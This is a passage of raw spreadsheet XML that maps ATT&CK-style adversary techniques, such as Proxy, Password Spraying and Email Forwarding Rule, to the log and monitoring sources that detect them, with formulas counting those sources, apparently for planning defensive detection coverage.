        <v>55</v>
      </c>
      <c r="D137" s="17">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E137" s="17">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F137" s="13"/>
      <c r="G137" s="53" t="str">
        <f>VLOOKUP(A137,'REF-DataSources'!A:B,2)</f>
        <v>Taint Shared Content</v>
      </c>
    </row>
    <row r="138" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A138" s="53" t="s">
        <v>171</v>
      </c>
      <c r="B138" s="17" t="str">
        <f>LOOKUP(A138,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Stackdriver logs,AWS CloudTrail logs,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C138" s="17"/>
      <c r="D138" s="17">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E138" s="17">
        <f t="shared" ref="E138:E201" si="6">LEN(TRIM(C138))-LEN(SUBSTITUTE(TRIM(C138),";",""))+1</f>
        <v>1</v>
      </c>
      <c r="F138" s="13"/>
      <c r="G138" s="53" t="str">
        <f>VLOOKUP(A138,'REF-DataSources'!A:B,2)</f>
        <v>System Information Discovery</v>
      </c>
    </row>
    <row r="139" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A139" s="55" t="s">
        <v>172</v>
      </c>
      <c r="B139" s="17" t="str">
        <f>LOOKUP(A139,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C139" s="17" t="s">
        <v>61</v>
      </c>
      <c r="D139" s="17">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E139" s="17">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F139" s="13"/>
      <c r="G139" s="53" t="str">
        <f>VLOOKUP(A139,'REF-DataSources'!A:B,2)</f>
        <v>File and Directory Discovery</v>
      </c>
    </row>
    <row r="140" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A140" s="53" t="s">
        <v>178</v>
      </c>
      <c r="B140" s="17" t="str">
        <f>LOOKUP(A140,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Office 365 account logs,API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C140" s="17"/>
      <c r="D140" s="17">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E140" s="17">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F140" s="13"/>
      <c r="G140" s="53" t="str">
        <f>VLOOKUP(A140,'REF-DataSources'!A:B,2)</f>
        <v>Account Discovery</v>
      </c>
    </row>
    <row r="141" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A141" s="55" t="s">
        <v>1161</v>
      </c>
      <c r="B141" s="17" t="str">
        <f>LOOKUP(A141,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C141" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D141" s="17">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E141" s="17">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F141" s="13"/>
      <c r="G141" s="53" t="str">
        <f>VLOOKUP(A141,'REF-DataSources'!A:B,2)</f>
        <v>Local Account</v>
      </c>
    </row>
    <row r="142" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A142" s="55" t="s">
        <v>1164</v>
      </c>
      <c r="B142" s="17" t="str">
        <f>LOOKUP(A142,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C142" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D142" s="17">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E142" s="17">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F142" s="13"/>
      <c r="G142" s="53" t="str">
        <f>VLOOKUP(A142,'REF-DataSources'!A:B,2)</f>
        <v>Domain Account</v>
      </c>
    </row>
    <row r="143" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A143" s="55" t="s">
        <v>1168</v>
      </c>
      <c r="B143" s="17" t="str">
        <f>LOOKUP(A143,'REF-DataSources'!A:C)</f>
        <v>Office 365 account logs,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C143" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D143" s="17">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E143" s="17">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F143" s="13"/>
      <c r="G143" s="53" t="str">
        <f>VLOOKUP(A143,'REF-DataSources'!A:B,2)</f>
        <v>Email Account</v>
      </c>
    </row>
    <row r="144" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A144" s="55" t="s">
        <v>1173</v>
      </c>
      <c r="B144" s="17" t="str">
        <f>LOOKUP(A144,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,AWS CloudTrail logs,Azure activity logs,Office 365 account logs,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C144" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D144" s="17">
        <f t="shared" si="5"/>
        <v>6</v>
      </c>
      <c r="E144" s="17">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F144" s="13"/>
      <c r="G144" s="53" t="str">
        <f>VLOOKUP(A144,'REF-DataSources'!A:B,2)</f>
        <v>Cloud Account</v>
      </c>
    </row>
    <row r="145" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A145" s="55" t="s">
        <v>183</v>
      </c>
      <c r="B145" s="17" t="str">
        <f>LOOKUP(A145,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Process use of network,Process monitoring,Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="C145" s="17" t="s">
        <v>184</v>
      </c>
      <c r="D145" s="17">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E145" s="17">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F145" s="13"/>
      <c r="G145" s="53" t="str">
        <f>VLOOKUP(A145,'REF-DataSources'!A:B,2)</f>
        <v>Proxy</v>
      </c>
    </row>
    <row r="146" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A146" s="55" t="s">
        <v>1183</v>
      </c>
      <c r="B146" s="17" t="str">
        <f>LOOKUP(A146,'REF-DataSources'!A:C)</f>
        <v>Process use of network,Process monitoring,Network protocol analysis,Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="C146" s="17" t="s">
        <v>184</v>
      </c>
      <c r="D146" s="17">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E146" s="17">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F146" s="13"/>
      <c r="G146" s="53" t="str">
        <f>VLOOKUP(A146,'REF-DataSources'!A:B,2)</f>
        <v>Internal Proxy</v>
      </c>
    </row>
    <row r="147" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A147" s="53" t="s">
        <v>1188</v>
      </c>
      <c r="B147" s="17" t="str">
        <f>LOOKUP(A147,'REF-DataSources'!A:C)</f>
        <v>Process use of network,Process monitoring,Network protocol analysis,Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="C147" s="17"/>
      <c r="D147" s="17">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E147" s="17">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F147" s="13"/>
      <c r="G147" s="53" t="str">
        <f>VLOOKUP(A147,'REF-DataSources'!A:B,2)</f>
        <v>External Proxy</v>
      </c>
    </row>
    <row r="148" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A148" s="53" t="s">
        <v>1192</v>
      </c>
      <c r="B148" s="17" t="str">
        <f>LOOKUP(A148,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Network protocol analysis,Netflow/Enclave netflow</v>
      </c>
      <c r="C148" s="17"/>
      <c r="D148" s="17">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E148" s="17">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F148" s="13"/>
      <c r="G148" s="53" t="str">
        <f>VLOOKUP(A148,'REF-DataSources'!A:B,2)</f>
        <v>Multi-hop Proxy</v>
      </c>
    </row>
    <row r="149" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A149" s="53" t="s">
        <v>1197</v>
      </c>
      <c r="B149" s="17" t="str">
        <f>LOOKUP(A149,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Packet capture</v>
      </c>
      <c r="C149" s="17"/>
      <c r="D149" s="17">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E149" s="17">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F149" s="13"/>
      <c r="G149" s="53" t="str">
        <f>VLOOKUP(A149,'REF-DataSources'!A:B,2)</f>
        <v>Domain Fronting</v>
      </c>
    </row>
    <row r="150" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A150" s="55" t="s">
        <v>185</v>
      </c>
      <c r="B150" s="17" t="str">
        <f>LOOKUP(A150,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Data loss prevention</v>
      </c>
      <c r="C150" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D150" s="17">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E150" s="17">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F150" s="13"/>
      <c r="G150" s="53" t="str">
        <f>VLOOKUP(A150,'REF-DataSources'!A:B,2)</f>
        <v>Replication Through Removable Media</v>
      </c>
    </row>
    <row r="151" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A151" s="55" t="s">
        <v>186</v>
      </c>
      <c r="B151" s="17" t="str">
        <f>LOOKUP(A151,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Data loss prevention</v>
      </c>
      <c r="C151" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D151" s="17">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E151" s="17">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F151" s="13"/>
      <c r="G151" s="53" t="str">
        <f>VLOOKUP(A151,'REF-DataSources'!A:B,2)</f>
        <v>Communication Through Removable Media</v>
      </c>
    </row>
    <row r="152" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A152" s="55" t="s">
        <v>190</v>
      </c>
      <c r="B152" s="17" t="str">
        <f>LOOKUP(A152,'REF-DataSources'!A:C)</f>
        <v>Host network interface,Netflow/Enclave netflow,Network intrusion detection system,Network protocol analysis,Packet capture,Process use of network</v>
      </c>
      <c r="C152" s="17" t="s">
        <v>191</v>
      </c>
      <c r="D152" s="17">
        <f t="shared" si="5"/>
        <v>6</v>
      </c>
      <c r="E152" s="17">
        <f t="shared" si="6"/>
        <v>6</v>
      </c>
      <c r="F152" s="13"/>
      <c r="G152" s="53" t="str">
        <f>VLOOKUP(A152,'REF-DataSources'!A:B,2)</f>
        <v>Non-Application Layer Protocol</v>
      </c>
    </row>
    <row r="153" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A153" s="53" t="s">
        <v>195</v>
      </c>
      <c r="B153" s="17" t="str">
        <f>LOOKUP(A153,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Windows event logs</v>
      </c>
      <c r="C153" s="17"/>
      <c r="D153" s="17">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E153" s="17">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F153" s="13"/>
      <c r="G153" s="53" t="str">
        <f>VLOOKUP(A153,'REF-DataSources'!A:B,2)</f>
        <v>Account Manipulation</v>
      </c>
    </row>
    <row r="154" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A154" s="55" t="s">
        <v>1220</v>
      </c>
      <c r="B154" s="17" t="str">
        <f>LOOKUP(A154,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,AWS CloudTrail logs,Azure activity logs</v>
      </c>
      <c r="C154" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D154" s="17">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E154" s="17">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F154" s="13"/>
      <c r="G154" s="53" t="str">
        <f>VLOOKUP(A154,'REF-DataSources'!A:B,2)</f>
        <v>Additional Cloud Credentials</v>
      </c>
    </row>
    <row r="155" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A155" s="55" t="s">
        <v>1226</v>
      </c>
      <c r="B155" s="17" t="str">
        <f>LOOKUP(A155,'REF-DataSources'!A:C)</f>
        <v>Office 365 audit logs</v>
      </c>
      <c r="C155" s="17" t="s">
        <v>114</v>
      </c>
      <c r="D155" s="17">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E155" s="17">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F155" s="13"/>
      <c r="G155" s="53" t="str">
        <f>VLOOKUP(A155,'REF-DataSources'!A:B,2)</f>
        <v>Exchange Email Delegate Permissions</v>
      </c>
    </row>
    <row r="156" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A156" s="55" t="s">
        <v>1231</v>
      </c>
      <c r="B156" s="17" t="str">
        <f>LOOKUP(A156,'REF-DataSources'!A:C)</f>
        <v>Office 365 audit logs</v>
      </c>
      <c r="C156" s="17" t="s">
        <v>114</v>
      </c>
      <c r="D156" s="17">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E156" s="17">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F156" s="13"/>
      <c r="G156" s="53" t="str">
        <f>VLOOKUP(A156,'REF-DataSources'!A:B,2)</f>
        <v>Add Office 365 Global Administrator Role</v>
      </c>
    </row>
    <row r="157" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A157" s="55" t="s">
        <v>1236</v>
      </c>
      <c r="B157" s="17" t="str">
        <f>LOOKUP(A157,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C157" s="17" t="s">
        <v>114</v>
      </c>
      <c r="D157" s="17">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E157" s="17">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F157" s="13"/>
      <c r="G157" s="53" t="str">
        <f>VLOOKUP(A157,'REF-DataSources'!A:B,2)</f>
        <v>SSH Authorized Keys</v>
      </c>
    </row>
    <row r="158" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A158" s="55" t="s">
        <v>200</v>
      </c>
      <c r="B158" s="17" t="str">
        <f>LOOKUP(A158,'REF-DataSources'!A:C)</f>
        <v>Host network interface,Netflow/Enclave netflow,Network protocol analysis,Packet capture,SSL/TLS inspection</v>
      </c>
      <c r="C158" s="17" t="s">
        <v>201</v>
      </c>
      <c r="D158" s="17">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E158" s="17">
        <f t="shared" si="6"/>
        <v>5</v>
      </c>
      <c r="F158" s="13"/>
      <c r="G158" s="53" t="str">
        <f>VLOOKUP(A158,'REF-DataSources'!A:B,2)</f>
        <v>Web Service</v>
      </c>
    </row>
    <row r="159" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A159" s="55" t="s">
        <v>1244</v>
      </c>
      <c r="B159" s="17" t="str">
        <f>LOOKUP(A159,'REF-DataSources'!A:C)</f>
        <v>Host network interface,Netflow/Enclave netflow,Network protocol analysis,Packet capture,SSL/TLS inspection</v>
      </c>
      <c r="C159" s="17" t="s">
        <v>201</v>
      </c>
      <c r="D159" s="17">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E159" s="17">
        <f t="shared" si="6"/>
        <v>5</v>
      </c>
      <c r="F159" s="13"/>
      <c r="G159" s="53" t="str">
        <f>VLOOKUP(A159,'REF-DataSources'!A:B,2)</f>
        <v>Dead Drop Resolver</v>
      </c>
    </row>
    <row r="160" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A160" s="55" t="s">
        <v>1248</v>
      </c>
      <c r="B160" s="17" t="str">
        <f>LOOKUP(A160,'REF-DataSources'!A:C)</f>
        <v>Host network interface,Netflow/Enclave netflow,Network protocol analysis,Packet capture,SSL/TLS inspection</v>
      </c>
      <c r="C160" s="17" t="s">
        <v>201</v>
      </c>
      <c r="D160" s="17">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E160" s="17">
        <f t="shared" si="6"/>
        <v>5</v>
      </c>
      <c r="F160" s="13"/>
      <c r="G160" s="53" t="str">
        <f>VLOOKUP(A160,'REF-DataSources'!A:B,2)</f>
        <v>Bidirectional Communication</v>
      </c>
    </row>
    <row r="161" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A161" s="55" t="s">
        <v>1251</v>
      </c>
      <c r="B161" s="17" t="str">
        <f>LOOKUP(A161,'REF-DataSources'!A:C)</f>
        <v>Host network interface,Netflow/Enclave netflow,Network protocol analysis,Packet capture,SSL/TLS inspection</v>
      </c>
      <c r="C161" s="17" t="s">
        <v>201</v>
      </c>
      <c r="D161" s="17">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E161" s="17">
        <f t="shared" si="6"/>
        <v>5</v>
      </c>
      <c r="F161" s="13"/>
      <c r="G161" s="53" t="str">
        <f>VLOOKUP(A161,'REF-DataSources'!A:B,2)</f>
        <v>One-Way Communication</v>
      </c>
    </row>
    <row r="162" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A162" s="55" t="s">
        <v>203</v>
      </c>
      <c r="B162" s="17" t="str">
        <f>LOOKUP(A162,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Network device logs,Network protocol analysis,Packet capture,Process use of network</v>
      </c>
      <c r="C162" s="17" t="s">
        <v>204</v>
      </c>
      <c r="D162" s="17">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E162" s="17">
        <f t="shared" si="6"/>
        <v>5</v>
      </c>
      <c r="F162" s="13"/>
      <c r="G162" s="53" t="str">
        <f>VLOOKUP(A162,'REF-DataSources'!A:B,2)</f>
        <v>Multi-Stage Channels</v>
      </c>
    </row>
    <row r="163" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A163" s="53" t="s">
        <v>205</v>
      </c>
      <c r="B163" s="17" t="str">
        <f>LOOKUP(A163,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,File monitoring,Packet capture,Process use of network,Netflow/Enclave netflow,Network protocol analysis,Process monitoring</v>
      </c>
      <c r="C163" s="17"/>
      <c r="D163" s="17">
        <f t="shared" si="5"/>
        <v>7</v>
      </c>
      <c r="E163" s="17">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F163" s="13"/>
      <c r="G163" s="53" t="str">
        <f>VLOOKUP(A163,'REF-DataSources'!A:B,2)</f>
        <v>Ingress Tool Transfer</v>
      </c>
    </row>
    <row r="164" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A164" s="53" t="s">
        <v>207</v>
      </c>
      <c r="B164" s="17" t="str">
        <f>LOOKUP(A164,'REF-DataSources'!A:C)</f>
        <v>System calls,Loaded DLLs,API monitoring,Process monitoring</v>
      </c>
      <c r="C164" s="17"/>
      <c r="D164" s="17">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E164" s="17">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F164" s="13"/>
      <c r="G164" s="53" t="str">
        <f>VLOOKUP(A164,'REF-DataSources'!A:B,2)</f>
        <v>Native API</v>
      </c>
    </row>
    <row r="165" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A165" s="55" t="s">
        <v>210</v>
      </c>
      <c r="B165" s="17" t="str">
        <f>LOOKUP(A165,'REF-DataSources'!A:C)</f>
        <v>Office 365 account logs,Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Process monitoring,Process use of network,Packet capture,Network protocol analysis,File monitoring,Authentication logs,Binary file metadata</v>
      </c>
      <c r="C165" s="17" t="s">
        <v>211</v>
      </c>
      <c r="D165" s="17">
        <f t="shared" si="5"/>
        <v>11</v>
      </c>
      <c r="E165" s="17">
        <f t="shared" si="6"/>
        <v>7</v>
      </c>
      <c r="F165" s="13"/>
      <c r="G165" s="53" t="str">
        <f>VLOOKUP(A165,'REF-DataSources'!A:B,2)</f>
        <v>Redundant Access</v>
      </c>
    </row>
    <row r="166" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A166" s="55" t="s">
        <v>214</v>
      </c>
      <c r="B166" s="17" t="str">
        <f>LOOKUP(A166,'REF-DataSources'!A:C)</f>
        <v>Office 365 account logs,Authentication logs</v>
      </c>
      <c r="C166" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D166" s="17">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E166" s="17">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F166" s="13"/>
      <c r="G166" s="53" t="str">
        <f>VLOOKUP(A166,'REF-DataSources'!A:B,2)</f>
        <v>Brute Force</v>
      </c>
    </row>
    <row r="167" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A167" s="55" t="s">
        <v>1279</v>
      </c>
      <c r="B167" s="17" t="str">
        <f>LOOKUP(A167,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Office 365 account logs</v>
      </c>
      <c r="C167" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D167" s="17">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E167" s="17">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F167" s="13"/>
      <c r="G167" s="53" t="str">
        <f>VLOOKUP(A167,'REF-DataSources'!A:B,2)</f>
        <v>Password Guessing</v>
      </c>
    </row>
    <row r="168" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A168" s="55" t="s">
        <v>1285</v>
      </c>
      <c r="B168" s="17" t="str">
        <f>LOOKUP(A168,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Office 365 account logs</v>
      </c>
      <c r="C168" s="17">
        <v>100</v>
      </c>
      <c r="D168" s="17">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E168" s="17">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F168" s="13"/>
      <c r="G168" s="53" t="str">
        <f>VLOOKUP(A168,'REF-DataSources'!A:B,2)</f>
        <v>Password Cracking</v>
      </c>
    </row>
    <row r="169" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A169" s="55" t="s">
        <v>1290</v>
      </c>
      <c r="B169" s="17" t="str">
        <f>LOOKUP(A169,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Office 365 account logs</v>
      </c>
      <c r="C169" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D169" s="17">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E169" s="17">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F169" s="13"/>
      <c r="G169" s="53" t="str">
        <f>VLOOKUP(A169,'REF-DataSources'!A:B,2)</f>
        <v>Password Spraying</v>
      </c>
    </row>
    <row r="170" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A170" s="55" t="s">
        <v>1294</v>
      </c>
      <c r="B170" s="17" t="str">
        <f>LOOKUP(A170,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Office 365 account logs</v>
      </c>
      <c r="C170" s="17">
        <v>100</v>
      </c>
      <c r="D170" s="17">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E170" s="17">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F170" s="13"/>
      <c r="G170" s="53" t="str">
        <f>VLOOKUP(A170,'REF-DataSources'!A:B,2)</f>
        <v>Credential Stuffing</v>
      </c>
    </row>
    <row r="171" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A171" s="55" t="s">
        <v>215</v>
      </c>
      <c r="B171" s="17" t="str">
        <f>LOOKUP(A171,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Kernel drivers</v>
      </c>
      <c r="C171" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D171" s="17">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E171" s="17">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F171" s="13"/>
      <c r="G171" s="53" t="str">
        <f>VLOOKUP(A171,'REF-DataSources'!A:B,2)</f>
        <v>Two-Factor Authentication Interception</v>
      </c>
    </row>
    <row r="172" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A172" s="55" t="s">
        <v>216</v>
      </c>
      <c r="B172" s="17" t="str">
        <f>LOOKUP(A172,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
      <c r="C172" s="17" t="s">
        <v>217</v>
      </c>
      <c r="D172" s="17">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E172" s="17">
        <f t="shared" si="6"/>
        <v>5</v>
      </c>
      <c r="F172" s="13"/>
      <c r="G172" s="53" t="str">
        <f>VLOOKUP(A172,'REF-DataSources'!A:B,2)</f>
        <v>Modify Registry</v>
      </c>
    </row>
    <row r="173" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A173" s="55" t="s">
        <v>218</v>
      </c>
      <c r="B173" s="17" t="str">
        <f>LOOKUP(A173,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,File monitoring</v>
      </c>
      <c r="C173" s="17" t="s">
        <v>219</v>
      </c>
      <c r="D173" s="17">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E173" s="17">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F173" s="13"/>
      <c r="G173" s="53" t="str">
        <f>VLOOKUP(A173,'REF-DataSources'!A:B,2)</f>
        <v>Screen Capture</v>
      </c>
    </row>
    <row r="174" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A174" s="53" t="s">
        <v>220</v>
      </c>
      <c r="B174" s="17" t="str">
        <f>LOOKUP(A174,'REF-DataSources'!A:C)</f>
        <v>Office 365 trace logs,Mail server,Email gateway,Authentication logs,File monitoring,Process monitoring,Process use of network</v>
      </c>
      <c r="C174" s="17"/>
      <c r="D174" s="17">
        <f t="shared" si="5"/>
        <v>7</v>
      </c>
      <c r="E174" s="17">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F174" s="13"/>
      <c r="G174" s="53" t="str">
        <f>VLOOKUP(A174,'REF-DataSources'!A:B,2)</f>
        <v>Email Collection</v>
      </c>
    </row>
    <row r="175" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A175" s="55" t="s">
        <v>1313</v>
      </c>
      <c r="B175" s="17" t="str">
        <f>LOOKUP(A175,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Authentication logs,Mail server</v>
      </c>
      <c r="C175" s="17" t="s">
        <v>221</v>
      </c>
      <c r="D175" s="17">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E175" s="17">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F175" s="13"/>
      <c r="G175" s="53" t="str">
        <f>VLOOKUP(A175,'REF-DataSources'!A:B,2)</f>
        <v>Local Email Collection</v>
      </c>
    </row>
    <row r="176" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A176" s="55" t="s">
        <v>1318</v>
      </c>
      <c r="B176" s="17" t="str">
        <f>LOOKUP(A176,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Email gateway,Mail server,Office 365 trace logs</v>
      </c>
      <c r="C176" s="17" t="s">
        <v>221</v>
      </c>
      <c r="D176" s="17">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E176" s="17">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F176" s="13"/>
      <c r="G176" s="53" t="str">
        <f>VLOOKUP(A176,'REF-DataSources'!A:B,2)</f>
        <v>Remote Email Collection</v>
      </c>
    </row>
    <row r="177" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A177" s="53" t="s">
        <v>1324</v>
      </c>
      <c r="B177" s="17" t="str">
        <f>LOOKUP(A177,'REF-DataSources'!A:C)</f>
        <v>Process use of network,Process monitoring,Email gateway,Mail server,Office 365 trace logs</v>
      </c>
      <c r="C177" s="17"/>
      <c r="D177" s="17">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E177" s="17">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F177" s="13"/>
      <c r="G177" s="53" t="str">
        <f>VLOOKUP(A177,'REF-DataSources'!A:B,2)</f>
        <v>Email Forwarding Rule</v>
      </c>
    </row>
    <row r="178" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A178" s="55" t="s">
        <v>222</v>
      </c>
      <c r="B178" s="17" t="str">
        <f>LOOKUP(A178,'REF-DataSources'!A:C)</f>
        <v>API monitoring</v>
      </c>
      <c r="C178" s="17">
        <v>100</v>
      </c>
      <c r="D178" s="17">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E178" s="17">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F178" s="13"/>
      <c r="G178" s="53" t="str">
